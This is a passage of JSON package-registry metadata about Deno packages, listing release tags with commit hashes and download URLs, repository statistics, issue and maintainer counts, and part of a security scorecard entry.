no/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:41:47.121Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.517641743763917,"dependent_packages_count":45.05979389543345,"stargazers_count":0.019289227680756138,"forks_count":1.2980935813308854,"docker_downloads_count":null,"average":19.473704612052252},"purl":"pkg:maven/org.mvnpm.at.deno/win32-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:win32-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-arm64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":622178,"maintainers_count":0,"namespaces_count":82612,"keywords_count":37065,"github":"maven-central","metadata":{"funded_packages_count":49047,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-08T05:02:10.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":8042165,"name":"deno_cache_dir","ecosystem":"cargo","description":"Cache directory logic used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":68,"first_release_published_at":"2023-08-07T16:38:10.736Z","latest_release_published_at":"2026-08-27T15:20:57.048Z","latest_release_number":"0.50.0","last_synced_at":"2026-09-07T22:53:50.797Z","created_at":"2023-08-07T16:41:54.044Z","updated_at":"2026-09-07T22:53:50.798Z","registry_url":"https://crates.io/crates/deno_cache_dir/","install_command":"cargo install deno_cache_dir","documentation_url":"https://docs.rs/deno_cache_dir/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: 